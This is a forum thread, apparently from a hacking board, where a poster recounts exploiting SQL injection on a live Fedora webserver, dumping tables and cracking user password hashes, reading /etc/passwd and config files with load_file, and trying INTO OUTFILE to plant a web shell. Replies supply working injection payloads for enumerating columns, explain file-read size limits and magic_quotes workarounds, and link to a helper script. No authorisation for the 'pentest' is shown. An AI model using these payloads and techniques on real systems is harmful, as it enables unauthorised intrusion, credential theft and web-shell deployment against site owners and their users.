recently i started making a pentest to a webserver using fedora, running squirremail,apache,php and mysql, i found an sql injection vulnerability, which i quick try to explore, i found that mysql was version 5.0.27 and it was running as root, therefore i was able to use load_file and outfile, i verify too that i have access to information_schema, after i grab all tables, i grab some interesting data, username and hashs, after this i tryed connect to webserver via web interface, ssh and mysql, for upload shell, all without sucess =(. i tryed outfile shell to public var of www but i obtain error because i dont have permissions, but i verify that i can outfile to /tmp and load_file with sucess, but this is useless since load_file return a string and i cant access shell on /tmp dir via include vulnerabilities. so i get tired and start think in other ways of obtain local access to that machine, i load_file httpd.conf for obtain vhost list to look for login pages data of forums or blogs to later upload shell. i get some interesting data but unfortunately some files dont have permissions, like some pages of vhosts and .htaccess files.
this is part of what i got
EDIT: all hashs cracked

so, about the mysql, my questions are:

1)i can load_file /etc/passwd and some *.php files but unfornately im unable to load_file some files like .htaccess and *php of some vhosts, this happen because its related to that file permissions or file_priv?

2)since i cannot read all content of a file, does load_file have limit of size when load files? how can i bypass this?

3)its possible using outfile when magic_quotes are on? because i tryed this on other machines using char, hex encoding and none of this worked, there is any solution for this?

4)for got the tables i use
select null,table_name,null from information_schema.tables, what should i use to get the columns?

5)its possible updating the content of a field, for later when page displayed execute php code?

help will be appreciated, regards.

for got the tables i use
select null,table_name,null from information_schema.tables, what should i use to get the columns?
use smth like that
select+1,column_name,3,4,5+from+information_schema .columns+where+table_name=0xtable_name_in_hex+limi t+0,1/*

thanks for the quick answer =)
if possible, clarify the other questions.


1)i can load_file /etc/passwd and some *.php files but unfornately im unable to load_file some files like .htaccess and *php of some vhosts, this happen because its related to that file permissions or file_priv?
i discovered that i was unable to outfile due to directory permissions, fortunately i obtained a directory with permissions and this solve my problem.
so, if possible try give solution for the other questions.
thanks.

i can load_file /etc/passwd and some *.php files but unfornately im unable to load_file some files like .htaccess and *php of some vhosts, this happen because its related to that file permissions or file_priv?

it is definitely related to the file permissions; as a rule, if file_priv is turned on only file permissions restrict an attacker

since i cannot read all content of a file, does load_file have limit of size when load files? how can i bypass this?

yes, load_file has a size limit which is defined by max_allowed_packet variable
More info:
LOAD_FILE (http://dev.mysql.com/doc/refman/4.1/en/string-functions.html#function_load-file)
max_allowed_packet (http://dev.mysql.com/doc/refman/5.1/en/program-variables.html)

its possible using outfile when magic_quotes are on? because i tryed this on other machines using char, hex encoding and none of this worked, there is any solution for this?
unfortunately, it is not possible, into_outfile accepts only a value between quotes.
More info:
INTO OUTFILE (http://websec.wordpress.com/2007/11/17/mysql-into-outfile/)

its possible updating the content of a field, for later when page displayed execute php code?
it depends on a certain web application; if it is prone to a php-include vulnerability so that web-app gets data from database and executes it then you can modify some fields and as a result you'll get a web-shell. However that is very rare situation. It happens much more often when you have a sql-injection where one of the columns is supposed to be opened as a file, and sometimes to be included as script. The latter is also rare

thanks so much for the answers, so just one more doubt left

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR( 105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR( 105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!
this will not work?

no, that won't work, as i've already said into outfile requires the quotes. And why do you use CONCAT after WHERE? You should just use the sequence of ASCII-codes in the CHAR() function, i.e.:
CHAR(39,97,100,109,105,110,39)

look, i just quote that text from here forum.antichat.ru/thread61678-mysql+cheat.html
so definitely is wrong.

look, i just quote that text from here forum.antichat.ru/thread61678-mysql+cheat.html
the author of that thread wanted to say that the material given in it didn't correspond to the facts. You could guess this idea if you knew Russian =)

all problems solved.
thanks Piflit and [Raz0r]

its possible using outfile when magic_quotes are on? because i tryed this on other machines using char, hex encoding and none of this worked, there is any solution for this?
sometimes this is possible
I described it here:
http://forum.antichat.ru/showpost.php?p=663815&postcount=39
this is a script for convenience:
http://forum.antichat.ru/showpost.php?p=685943&postcount=54

Scipio sorry for the delay of my response,
thanks for providing more information and the script.